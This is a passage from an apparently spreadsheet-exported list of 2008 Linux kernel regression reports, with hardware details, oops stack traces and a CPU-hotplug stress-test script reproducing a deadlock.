    <t>Subject : FIXED_PHY must depend on PHYLIB=y Submitter : Olaf Hering &lt;olaf@aepfle.de&gt; References : http://lkml.org/lkml/2008/2/27/90 Caused-By : Vitaly Bordug &lt;vitb@kernel.crashing.org&gt; commit a79d8e93d300adb84cccc38ac396cfb118c238ad Handled-By : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; Patch : http://lkml.org/lkml/2008/2/27/157</t>
  </si>
  <si>
    <t>No power-off / reboot with 2.6.25-rcX (up to -rc3) kernels</t>
  </si>
  <si>
    <t>2008-02-27 08:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc2 Earliest failing kernel version: 2,6-25-rc0 Distribution: Debian etch Hardware Environment: Compaq AP400 2 x Pentium-II @ 400MHz Software Environment: Kernel Problem Description: Power off / reboot blink keyboard LEDs and leave the system at [sdb] synchronizing SCSI cache [sda] synchronizing SCSI cache Notice, this machine is known for ACPI bugs, but up to 2.6.24.2 power-off / reboot worked. Steps to reproduce: issue "halt" or "reboot"</t>
  </si>
  <si>
    <t>no GSI - using IRQ 11 - Intel SC450NX - 2.6.23 regression</t>
  </si>
  <si>
    <t>2008-02-27 14:19 UTC</t>
  </si>
  <si>
    <t>2008-06-25 14:34 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.x Earliest failing kernel version: 2.6.23.x (haven't yet tested the rc's) Distribution: Debian Sid Hardware Environment: Intel SC450NX system (Quad P3 Xeon) Software Environment: Debian Sid Problem Description: With all kernels I have tried later than 2.6.22.x my SC450NX system hangs a long time at boot with messages like: scsi 0:0:6:0: ABORT operation timed-out. scsi 0:0:6:0: DEVICE RESET operation started scsi 1:0:6:0: ABORT operation timed-out. scsi 1:0:6:0: DEVICE RESET operation started scsi 0:0:6:0: DEVICE RESET operation timed-out. scsi 0:0:6:0: BUS RESET operation started scsi 1:0:6:0: DEVICE RESET operation timed-out. scsi 1:0:6:0: BUS RESET operation started scsi 0:0:6:0: BUS RESET operation timed-out. scsi 0:0:6:0: HOST RESET operation started sym0: SCSI BUS has been reset. scsi 1:0:6:0: BUS RESET operation timed-out. scsi 1:0:6:0: HOST RESET operation started sym1: SCSI BUS has been reset. scsi 0:0:6:0: HOST RESET operation timed-out. scsi 0:0:6:0: Device offlined - not ready after error recovery scsi 1:0:6:0: HOST RESET operation timed-out. scsi 1:0:6:0: Device offlined - not ready after error recovery scsi 0:0:8:0: ABORT operation started scsi 1:0:8:0: ABORT operation started on all scsi ids (in use or not) on two scsi channels. This is alarming enough, but when the system finally starts up, I also find that one of my nic's have stopped working. A quick check at /proc/interrupts shows that there are lot's of differences from the "usual" interrupts. I'll attach /proc/interrupts from both a working and non working kernel, and post dmesg from both. The problem is that with the 2.6.25-rc3 kernel, I can't get the beginning of the dmesg.. Is there a trick other than dmesg -s 65536? Thanks :) Steps to reproduce:</t>
  </si>
  <si>
    <t>fw_core_handle_bus_reset - BUG at lib/list_debug.c:33</t>
  </si>
  <si>
    <t>2008-02-28 02:18 UTC</t>
  </si>
  <si>
    <t>2008-11-29 04:47 UTC</t>
  </si>
  <si>
    <t>From http://bugzilla.kernel.org/show_bug.cgi?id=9870#c2 : VT6307 OHCI 1.0 controller, Iogear hub, Fire-i camera cause bus resets which end up in kernel BUG at lib/list_debug.c:33! invalid opcode: 0000 [1] SMP CPU 0 Modules linked in: radeon drm ipt_MASQUERADE iptable_nat nf_nat bridge rfcomm l2cap bluetooth autofs4 sunrpc nf_conntrack_ipv4 ipt_REJECT iptable_filter ip_tables nf_conntrack_ipv6 xt_state nf_conntrack xt_tcpudp ip6t_ipv6header ip6t_REJECT ip6table_filter ip6_tables x_tables ipv6 cpufreq_ondemand dm_multipath firewire_sbp2 parport_pc parport floppy snd_intel8x0 snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq pcspkr firewire_ohci firewire_core snd_seq_device serio_raw snd_pcm_oss crc_itu_t snd_mixer_oss k8temp hwmon snd_pcm snd_timer snd soundcore snd_page_alloc forcedeth i2c_nforce2 i2c_core button sr_mod sg cdrom pata_amd dm_snapshot dm_zero dm_mirror dm_mod shpchp sata_sil libata sd_mod scsi_mod ext3 jbd mbcache uhci_hcd ohci_hcd ehci_hcd Pid: 0, comm: swapper Not tainted 2.6.24-9.fc9 #1 RIP: 0010:[&lt;ffffffff8113259a&gt;] [&lt;ffffffff8113259a&gt;] __list_add+0x47/0x5b RSP: 0018:ffffffff8155adf0 EFLAGS: 00010086 RAX: 0000000000000079 RBX: ffff81003e9cc6e8 RCX: ffff81003d53c198 RDX: ffffffff813a37a0 RSI: 0000000000000001 RDI: ffffffff813a92a0 RBP: ffff81003d53c198 R08: ffffffff813a92c0 R09: ffff810001005900 R10: 000000000000a7b9 R11: 0000000000000000 R12: ffff81003e0e0000 R13: 0000000000000000 R14: 000000000000003f R15: ffff81003d53c220 FS: 0000000040a00950(0000) GS:ffffffff813ee000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000647000 CR3: 000000003c844000 CR4: 00000000000006a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper (pid: 0, threadinfo ffffffff81498000, task ffffffff813a37a0) Stack: ffff81003e0e0000 ffffffff88193fbb ffffffff813a4008 ffffffff00000002 ffff81003d53c1a8 ffff81003e0e0648 0000000100012a4e ffff81003e0e064c ffff81003e0e0640 0000000300000000 ffff81003e0e04a8 0000000000000246 Call Trace: &lt;IRQ&gt; [&lt;ffffffff88193fbb&gt;] :firewire_core:fw_core_handle_bus_reset+0x67a/0x758 [&lt;ffffffff81276950&gt;] _spin_unlock_irqrestore+0x3e/0x44 [&lt;ffffffff8103d32c&gt;] tasklet_action+0x2e/0xb0 [&lt;ffffffff8103d35b&gt;] tasklet_action+0x5d/0xb0 [&lt;ffffffff8103d23d&gt;] __do_softirq+0x5e/0xe0 [&lt;ffffffff81053c99&gt;] lock_release_holdtime+0x27/0x49 [&lt;ffffffff8100d0cc&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff8100e6ce&gt;] do_softirq+0x31/0x86 [&lt;ffffffff8103d19b&gt;] irq_exit+0x4e/0x92 [&lt;ffffffff8100e861&gt;] do_IRQ+0x13e/0x161 [&lt;ffffffff8100b066&gt;] default_idle+0x0/0x51 [&lt;ffffffff8100b066&gt;] default_idle+0x0/0x51 [&lt;ffffffff8100c456&gt;] ret_from_intr+0x0/0xf &lt;EOI&gt; [&lt;ffffffff8101ce78&gt;] lapic_next_event+0x0/0xa [&lt;ffffffff8100b066&gt;] default_idle+0x0/0x51 [&lt;ffffffff8100b09d&gt;] default_idle+0x37/0x51 [&lt;ffffffff8100b09b&gt;] default_idle+0x35/0x51 [&lt;ffffffff8100b155&gt;] cpu_idle+0x9e/0xc6 [&lt;ffffffff814a2b2b&gt;] start_kernel+0x301/0x30d [&lt;ffffffff814a211d&gt;] _sinittext+0x11d/0x124 Code: 0f 0b eb fe 48 89 7e 08 48 89 37 48 89 57 08 48 89 3a 5a c3 RIP [&lt;ffffffff8113259a&gt;] __list_add+0x47/0x5b RSP &lt;ffffffff8155adf0&gt; ---[ end trace d4a4f763a33e3c92 ]--- Kernel panic - not syncing: Aiee, killing interrupt handler! See also http://bugzilla.kernel.org/show_bug.cgi?id=9870#c23 http://bugzilla.kernel.org/show_bug.cgi?id=9870#c24 http://bugzilla.kernel.org/show_bug.cgi?id=9870#c26 http://bugzilla.kernel.org/show_bug.cgi?id=9870#c28</t>
  </si>
  <si>
    <t>ieee1394: list corruption when unloading ohci1394</t>
  </si>
  <si>
    <t>2008-02-28 03:58 UTC</t>
  </si>
  <si>
    <t>2008-12-02 10:50 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: unknown Hardware Environment: UP PC with two VT6306 cards does *not* happen on the same PC with just on VT6306 card does *not* happen on an SMP PC with one FW323 card I.e. the problem most certainly depends on the presence of more than one card. "modprobe -r ohci1394" on a kernel with list debugging enabled (and slab debugging, FWIW) results in ieee1394: Node removed: ID:BUS[1-00:1023] GUID[00301bac00002ba4] list_del corruption. prev-&gt;next should be f7ca6ef0, but was fa92f5a0 ------------[ cut here ]------------ kernel BUG at lib/list_debug.c:67! invalid opcode: 0000 [#1] DEBUG_PAGEALLOC Modules linked in: snd_via82xx snd_ac97_codec ac97_bus snd_pcm snd_timer snd_page_alloc snd_mpu401_uart snd_rawmidi snd lp af_packet 8139too mii ohci1394(-) ieee1394 loop via_agp agpgart uhci_hcd [last unloaded: eth1394] Pid: 4476, comm: modprobe Not tainted (2.6.25-rc3 #2) EIP: 0060:[&lt;c01e76e5&gt;] EFLAGS: 00010096 CPU: 0 EIP is at list_del+0x45/0x70 EAX: 00000048 EBX: f7ca6ef0 ECX: 00000000 EDX: f48e3550 ESI: fa92e684 EDI: f3a32000 EBP: f4911e84 ESP: f4911e74 DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 Process modprobe (pid: 4476, ti=f4911000 task=f48e3550 task.ti=f4911000) Stack: c03431d0 f7ca6ef0 fa92f5a0 f7ca6ef0 f4911e90 fa91de2b f39b77c0 f4911ebc fa91deba fa92e5c0 f3a32000 f3a33b40 00000292 00000000 fa92e660 fa92e660 f3a32000 f3a33b40 f4911ecc fa91e6ab f3a32000 f88f6310 f4911ed8 fa91d9d4 Call Trace: [&lt;fa91de2b&gt;] ? __delete_addr+0xb/0x20 [ieee1394] [&lt;fa91deba&gt;] ? __unregister_host+0x7a/0xb0 [ieee1394] [&lt;fa91e6ab&gt;] ? highlevel_remove_host+0x2b/0x50 [ieee1394] [&lt;fa91d9d4&gt;] ? hpsb_remove_host+0x34/0x50 [ieee1394] [&lt;f88f2b87&gt;] ? ohci1394_pci_remove+0x67/0x1f0 [ohci1394] [&lt;c01ec45a&gt;] ? pci_device_remove+0x3a/0x50 [&lt;c02260fa&gt;] ? __device_release_driver+0x8a/0x90 [&lt;c0226255&gt;] ? driver_detach+0x105/0x110 [&lt;c02256cf&gt;] ? bus_remove_driver+0x3f/0x60 [&lt;c0226555&gt;] ? driver_unregister+0x15/0x20 [&lt;c01ec6d3&gt;] ? pci_unregister_driver+0x13/0x20 [&lt;f88f37ed&gt;] ? ohci1394_cleanup+0xd/0xf [ohci1394] [&lt;c013b6f3&gt;] ? sys_delete_module+0x143/0x170 [&lt;c0135c0b&gt;] ? __lock_release+0x3b/0x60 [&lt;c0102f35&gt;] ? sysenter_past_esp+0x9a/0xa5 [&lt;c0134822&gt;] ? trace_hardirqs_on+0xb2/0x120 [&lt;c0102efa&gt;] ? sysenter_past_esp+0x5f/0xa5 ======================= Code: 4a 04 89 11 c7 40 04 00 02 20 00 c7 00 00 01 10 00 83 c4 0c 5b c9 c3 89 54 24 08 89 44 24 04 c7 04 24 d0 31 34 c0 e8 0b 01 f3 ff &lt;0f&gt; 0b eb fe 8d b4 26 00 00 00 00 89 5c 24 08 89 44 24 04 c7 04 EIP: [&lt;c01e76e5&gt;] list_del+0x45/0x70 SS:ESP 0068:f4911e74 ---[ end trace 2e1c0c602a29e28d ]---</t>
  </si>
  <si>
    <t>2.6.25 git regression, oops on boot</t>
  </si>
  <si>
    <t>2.6.25 git</t>
  </si>
  <si>
    <t>2008-02-28 19:14 UTC</t>
  </si>
  <si>
    <t>2008-03-13 20:17 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc kernel hangs on boot Submitter : Jonathan McDowell &lt;noodles@earth.li&gt; Date : 2008-02-29 11:09 References : http://marc.info/?l=linux-kernel&amp;m=120423268404812&amp;w=2 Handled-By : "Zhang Rui" &lt;rui.zhang@intel.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Panic with all 2.6.24 kernels on a Thinkpad R31</t>
  </si>
  <si>
    <t>2.6.24xxx</t>
  </si>
  <si>
    <t>2008-02-29 07:31 UTC</t>
  </si>
  <si>
    <t>widux</t>
  </si>
  <si>
    <t>2009-04-25 00:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.23 Earliest failing kernel version:2.6.24 Distribution:sidux Hardware Environment: Host/Kernel/OS "widux" running Linux 2.6.23.15-slh-smp-1 i686 [ sidux 2007-04.5 - Έρως christmas special - kde-lite - (200712260129) ] CPU Info Mobile Intel Celeron 256 KB cache flags( sse ) clocked at [ 1199.925 MHz ] Videocard Intel 82830 CGC [Chipset Graphics Controller] X.Org 1.4.0.90 [ 1024x768@75.0hz ] Network cards Intel 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller, at port: 7000 RaLink RT2561/RT61 802.11g PCI Processes 102 | Uptime 1:48 | Memory 229.8/495.8MB | HDD ATA TOSHIBA MK8032GA Size 80GB (21%used) | Client Shell | Infobash v3.01 Software Environment: Problem Description: With the 2.6.24-Kernel I always got kernel panic after a few minutes. It doesn't matter if I used the sidux-kernel or the debian-kernel or a pure vanilla. There are no entries in the logs which I can post - that's why it is difficult for me to find any hints. Often the panic comes, when I open three or more tabs in iceweasel/epiphany/opera or when I started a few applications. Sometimes during apt-get update/upgrade. I didn't have this problem with any kernel before 2.6.24. memtest was ok. Steps to reproduce: Panic always after booting into 2.6.24.</t>
  </si>
  <si>
    <t>HP t5710 builtin radeon interrupt routed incorrectly</t>
  </si>
  <si>
    <t>2008-02-29 15:29 UTC</t>
  </si>
  <si>
    <t>2008-03-14 19:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: all &lt;= 2.6.25-rc3 Hardware Environment: HP t5710 thin client The AWRDACPI TM8000 DSDT, OEM revision 0x1003 (4099), has an incorrect _PRT entry for the Radeon video device on the motherboard. The _PRT claims PCI interrupt 0000:01:00.0[A] is connected to LNK1, but it is really connected to LNK3. When the X Radeon driver (with DRI enabled) starts, we get a flood of radeon interrupts on IRQ 3, and we eventually disable it, which also kills the USB mouse and keyboard that are also on IRQ 3: [drm] Setting GART location based on new memory map [drm] writeback test succeeded in 0 usecs irq 3: nobody cared (try booting with the "irqpoll" option) [&lt;c01042ca&gt;] show_trace_log_lvl+0x1a/0x30 [&lt;c0104882&gt;] show_trace+0x12/0x20 [&lt;c0104936&gt;] dump_stack+0x16/0x20 [&lt;c012d899&gt;] __report_bad_irq+0x39/0x80 [&lt;c012da58&gt;] note_interrupt+0x178/0x1c0 [&lt;c012e233&gt;] handle_level_irq+0x73/0xa0 [&lt;c0105809&gt;] do_IRQ+0x79/0xa0 [&lt;c0103e3b&gt;] common_interrupt+0x23/0x28 [&lt;c0149a92&gt;] do_lookup+0x22/0x140 [&lt;c014ae12&gt;] __link_path_walk+0x252/0x9f0 [&lt;c014b5f9&gt;] link_path_walk+0x49/0xc0 [&lt;c014b8d6&gt;] do_path_lookup+0x156/0x170 [&lt;c014c2c4&gt;] __path_lookup_intent_open+0x44/0x80 [&lt;c014c381&gt;] path_lookup_open+0x21/0x30 [&lt;c014c467&gt;] open_namei+0x67/0x540 [&lt;c0142996&gt;] do_filp_open+0x26/0x40 [&lt;c01429f3&gt;] do_sys_open+0x43/0xd0 [&lt;c0142abc&gt;] sys_open+0x1c/0x20 [&lt;c0103cc4&gt;] syscall_call+0x7/0xb ======================= handlers: [&lt;c02298d0&gt;] (usb_hcd_irq+0x0/0x60) [&lt;c02298d0&gt;] (usb_hcd_irq+0x0/0x60) Disabling IRQ #3 Patching the DSDT to report LNK3 instead of LNK1 works around the problem, but is obviously not a good solution for end-users.</t>
  </si>
  <si>
    <t>fujitsu-laptop inconsistency due to hardware controlled fn-keys</t>
  </si>
  <si>
    <t>2008-03-01 04:03 UTC</t>
  </si>
  <si>
    <t>Jonathan Woithe</t>
  </si>
  <si>
    <t>Using the new fujitsu-laptop module on my lifebook p7010 I have encountered a peculiar problem that confuses user space tools such as xbacklight which can set the brightness of the panel. For example, if brightness is set 100% cat /sys/class/backlight/fujitsu-laptop/brightness returns 7. As does cat /sys/class/backlight/fujitsu-laptop/actual_brightness. Decreasing the the brightness through the sysfs interface by echoing, say, 4 to fujitsu-laptop/brightness, also changes the value that resides in actual_brightness. However (and this is the problem), changing the brightness by means of the Fn-keys, 'actual_brightness' is changed but not 'brightness'. This causes tools such as the previously mentioned xbacklight to believe that the brightness is still 100%. I'm not sure whether this bug in fact should be filed against those tools, or if it should be handled here. Please let me know what information to attach here.</t>
  </si>
  <si>
    <t>Kernel blocked after "ACPI: bus type pci registered"</t>
  </si>
  <si>
    <t>2.6.25-rc3-git3</t>
  </si>
  <si>
    <t>2008-03-01 08:13 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc3 Earliest failing kernel version:2.6.25-rc3-git3 Distribution: Gentoo Hardware Environment: Packard Bell EasyNote, Intel Core 2 Duo Software Environment: Gentoo Problem Description: Steps to reproduce: Simply try to boot the computer ! With the current version of 2.6.25-git, the kernel stop after "ACPI: bus type pci registered". After having tried git-bisect once again, it seems that the following commit is problematic: 8be8f54bae3453588011cad06363813a5293af53 is first bad commit commit 8be8f54bae3453588011cad06363813a5293af53 Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Sat Feb 23 20:43:21 2008 +0100 x86: CPA: avoid split of alias mappings If I revert it, things work a little better but the kernel once again stop when it try to scan the partition table.</t>
  </si>
  <si>
    <t>apanel: fix kconfig dependencies</t>
  </si>
  <si>
    <t>2008-03-02 11:21 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:30 UTC</t>
  </si>
  <si>
    <t>Subject : apanel: fix kconfig dependencies Submitter : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; References : http://lkml.org/lkml/2008/2/6/492 Date : 2008-02-06 16:27 Caused-By : Stephen Hemminger &lt;shemminger@linux-foundation.org&gt; commit 52fe0cdb090a344cad9d95461ad06239e0c28712 Handled-By : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Patch : http://lkml.org/lkml/2008/2/7/333</t>
  </si>
  <si>
    <t>2.6.25-rc: complete lockup on boot/start of X (bisected)</t>
  </si>
  <si>
    <t>2008-03-02 13:40 UTC</t>
  </si>
  <si>
    <t>2008-03-26 16:59 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc: complete lockup on boot/start of X (bisected) Submitter : Marcin Slusarz &lt;marcin.slusarz@gmail.com&gt; Date : 2008-03-02 20:00 References : http://lkml.org/lkml/2008/3/2/91 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sh r7780mp_defconfig compile error</t>
  </si>
  <si>
    <t>2008-03-02 13:42 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:27 UTC</t>
  </si>
  <si>
    <t>Subject : sh r7780mp_defconfig compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/3/2/141 Caused-By : Stuart Menefy &lt;stuart.menefy@st.com&gt; commit d02b08f6e8b184ffef349e395210a5e82ff4f4bc</t>
  </si>
  <si>
    <t>[BUG  kernel 2.6.25-rc3  IPV6]  ping6 -I eth0 ff02::1 causes system hang.</t>
  </si>
  <si>
    <t>2008-03-02 13:45 UTC</t>
  </si>
  <si>
    <t>2008-03-09 16:45 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG kernel 2.6.25-rc3 IPV6] ping6 -I eth0 ff02::1 causes system hang. Submitter : Komuro &lt;komurojun-mbn@nifty.com&gt; Date : 2008-03-02 13:07 References : http://lkml.org/lkml/2008/3/2/32 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bisected boot regression post 2.6.25-rc3.. please revert</t>
  </si>
  <si>
    <t>2008-03-02 13:54 UTC</t>
  </si>
  <si>
    <t>2008-03-05 14:50 UTC</t>
  </si>
  <si>
    <t>Subject : bisected boot regression post 2.6.25-rc3.. please revert Submitter : Arjan van de Ven &lt;arjan@linux.intel.com&gt; Date : 2008-03-01 10:56 References : http://lkml.org/lkml/2008/3/1/155 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Emu10k1 Digital Output jack broken (wrong signal, sblive 5.1)</t>
  </si>
  <si>
    <t>2008-03-02 14:27 UTC</t>
  </si>
  <si>
    <t>Francois Cartegnie</t>
  </si>
  <si>
    <t>2008-09-26 06:50 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.17 / 2.6.22.1 Earliest failing kernel version: Distribution:Mandriva Hardware Environment:AMD64 Software Environment: Problem Description: Digital Output is broken with SB Live 5.1: "SB Live Analog/Digital Output Jack" I read some thread about it: http://readlist.com/lists/vger.kernel.org/linux-kernel/85/429383.html And wasn't able to get SPDIF out working again through controls. (My speakers 5.1 decoder monitors the line status, and so I was able to see that no valid digital signal was coming from the cable). I finally made it... by plugging the digital out 3.5 plug half the way ! So there's something changed in the SPDIF digital output jack control. The working configuration with 2.6.17 (2.6.22 too ?) kernels is : amixer set 'IEC958 Optical Raw Playback Switch' 0 amixer set 'IEC958 Optical Raw' off amixer set 'SB Live Analog/Digital Output Jack' on But the control 'IEC958 Optical Raw Playback Switch' have now changed and is now bound to 2 values instead of just being a switch. I think the problem comes from this control wich now emits 2 signals (digital+digital, digital+analog?) instead of just one and the decoders gets confused. That's why plugging the 3.5" jack half way (mono) fixes cable signal.</t>
  </si>
  <si>
    <t>Clocksource tsc is always unstable with 2.6.25-* kernels and CONFIG_NO_HZ=y on my box</t>
  </si>
  <si>
    <t>2008-03-02 14:29 UTC</t>
  </si>
  <si>
    <t>2008-03-29 02:47 UTC</t>
  </si>
  <si>
    <t>Subject : Clocksource tsc is always unstable with 2.6.25-* kernels and CONFIG_NO_HZ=y on my box Submitter : Gabriel C &lt;nix.or.die@googlemail.com&gt; Date : 2008-02-24 01:31 References : http://lkml.org/lkml/2008/2/23/380 References : http://lkml.org/lkml/2008/2/24/281 Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>(regression) kernel/timeconst.h bugs with HZ=128</t>
  </si>
  <si>
    <t>2008-03-02 14:57 UTC</t>
  </si>
  <si>
    <t>2009-03-23 09:23 UTC</t>
  </si>
  <si>
    <t>Subject : (regression) kernel/timeconst.h bugs with HZ=128 Submitter : David Brownell &lt;david-b@pacbell.net&gt; Date : 2008-02-26 19:32 References : http://lkml.org/lkml/2008/2/26/294 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.25-rc3 regression] sysctl table check failed: /kernel/vsyscall64</t>
  </si>
  <si>
    <t>2008-03-02 15:02 UTC</t>
  </si>
  <si>
    <t>2008-03-02 15:29 UTC</t>
  </si>
  <si>
    <t>Subject : Submitter : Date : References : Handled-By : Patch : This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Some processes are dealocked when one cpu is set to offline</t>
  </si>
  <si>
    <t>2.6.25-rc2 and rc3</t>
  </si>
  <si>
    <t>2008-03-02 22:31 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknow Earliest failing kernel version: 2.6.25-rc2, 2.6.25-rc3 Distribution: RHEL 5.1 Hardware Environment: Intel Xeon 3.40GHz, 4 cores per cpu Software Environment: RHEL 5.1 Problem Description: When i run cpu hotplug stress test on a system with 16 logical cpus, some processes are deadlocked, it can be regenerated on 2.6.25-rc2 and 2.6.25-rc3. The kernel thread [watchdog/1] isn't reaped by its parent when cpu #1 is set to offline, so that [kstopmachine] sleeps for ever. Steps to reproduce: Here is my stress test script, you may try it on SMP platforms (the more number of cpu is , the easier it can be regenerated.). ######################################################################## ####### stresscpus.sh ####### #!/bin/sh for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 do ./bugexposure.sh $i &amp; done ######## bugexposure.sh ########### #!/bin/bash main(){ typeset -i CPU=$1 ./task.sh &gt; /dev/null&amp; PID=$! if [ `cat /sys/devices/system/cpu/cpu${CPU}/online` = "0" ]; then echo "1" &gt; /sys/devices/system/cpu/cpu${CPU}/online fi MASK=$((1&lt;&lt;${CPU})) `taskset -p ${MASK} ${PID} &gt; /dev/null 2&gt;&amp;1` echo "0" &gt; /sys/devices/system/cpu/cpu${CPU}/online echo "1" &gt; /sys/devices/system/cpu/cpu${CPU}/online disown $PID kill -9 $PID &gt; /dev/null 2&gt;&amp;1 #echo "PASS\n" } typeset -i TEST_CPU=$1 while true do main $TEST_CPU done ###### task.sh ###### #!/bin/bash while : do NOOP=1 done ########################################################################</t>
  </si>
  <si>
    <t>ntfs build failure on no-mmu</t>
  </si>
  <si>
    <t>2008-03-03 11:05 UTC</t>
  </si>
  <si>
    <t>2008-03-14 00:23 UTC</t>
  </si>
  <si>
    <t>Subject : ntfs build failure on no-mmu Submitter : Mike Frysinger &lt;vapier.adi@gmail.com&gt; References : http://lkml.org/lkml/2008/3/1/179 Caused-By : David Howells &lt;dhowells@redhat.com&gt; commit 8ca3ed87db062201e1fa15b64a9214e193fc3a8a Note: The patch from the bug report is not usable since it would revert commit 8ca3ed87db062201e1fa15b64a9214e193fc3a8a that was itself a regression fix...</t>
  </si>
  <si>
    <t>netconsole broken</t>
  </si>
  <si>
    <t>2008-03-04 14:44 UTC</t>
  </si>
  <si>
    <t>2008-03-05 15:34 UTC</t>
  </si>
  <si>
    <t>Subject : locking api self-test hanging Submitter : Andrew Morton &lt;akpm@linux-foundation.org&gt; Date : 2008-03-04 06:05 References : http://lkml.org/lkml/2008/2/3/215 Handled-By : David Miller &lt;davem@davemloft.net&gt; Patch : http://lkml.org/lkml/2008/3/4/421 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at drivers/usb/host/ehci-hcd.c:287</t>
  </si>
  <si>
    <t>2008-03-04 15:07 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING: at drivers/usb/host/ehci-hcd.c:287 Submitter : Christian Kujau &lt;lists@nerdbynature.de&gt; Date : 2008-03-03 01:05 References : http://lkml.org/lkml/2008/3/2/171 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; Handled-By : David Brownell &lt;david-b@pacbell.net&gt; Patch : http://lkml.org/lkml/2008/3/4/420 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Virtualization</t>
  </si>
  <si>
    <t>kvm</t>
  </si>
  <si>
    <t>2.6.25-rc4</t>
  </si>
  <si>
    <t>Avi Kivity</t>
  </si>
  <si>
    <t>Toshiba Bluetooth adapter is disabled - Toshiba Satellite A100-847 (request for omnibook driver)</t>
  </si>
  <si>
    <t>2008-03-05 08:58 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: none Distribution: Fedora 8 Hardware Environment: Toshiba Satellite A100-847 Software Environment: Fedora 8 Problem Description: Toshiba Bluetooth adapter is in disabled state by default. It works perfectly well if enabled, which can be accomplished by means of either omnibook module [1]. Merely loading it makes the adapter show up. It can be enabled/disabled as well. Unfortunately, omnibook developers do not have time to merge the driver upstream [2], but maybe it would be possible just to merge some parts of it? [1] http://omnibook.sourceforge.net/doku.php [2] http://sourceforge.net/mailarchive/forum.php?thread_name=47234CDE.8080802%40poczta.onet.pl&amp;forum_name=omnibook-devel Steps to reproduce: 1. Get a Toshiba Satellite A100 laptop (or a similar one) 2. Fire it up</t>
  </si>
  <si>
    <t>general protection fault in modul xts in combination with via padlock in 2.6.24.2</t>
  </si>
  <si>
    <t>2008-03-05 09:00 UTC</t>
  </si>
  <si>
    <t>David Brodski</t>
  </si>
  <si>
    <t>2008-09-26 06:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: ? 2.6.24.2 Distribution: Arch-Linux Hardware Environment: __________________________________________ /proc/cpuinfo: __________________________________________ processor : 0 vendor_id : CentaurHauls cpu family : 6 model : 10 model name : VIA Esther processor 1500MHz stepping : 9 cpu MHz : 798.080 cache size : 128 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge cmov pat clflush acpi mmx fxsr sse sse2 tm nx pni est tm2 rng rng_en ace ace_en ace2 ace2_en phe phe_en pmm pmm_en bogomips : 1597.44 clflush size : 64 ___________________________________________________________ lspci -vvv: ___________________________________________________________ 00:00.0 Host bridge: VIA Technologies, Inc. CN700/VN800/P4M800CE/Pro Host Bridge Subsystem: VIA Technologies, Inc. CN700/VN800/P4M800CE/Pro Host Bridge Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 8 Region 0: Memory at f8000000 (32-bit, prefetchable) [size=32M] Capabilities: [80] AGP version 3.5 Status: RQ=8 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [50] Power 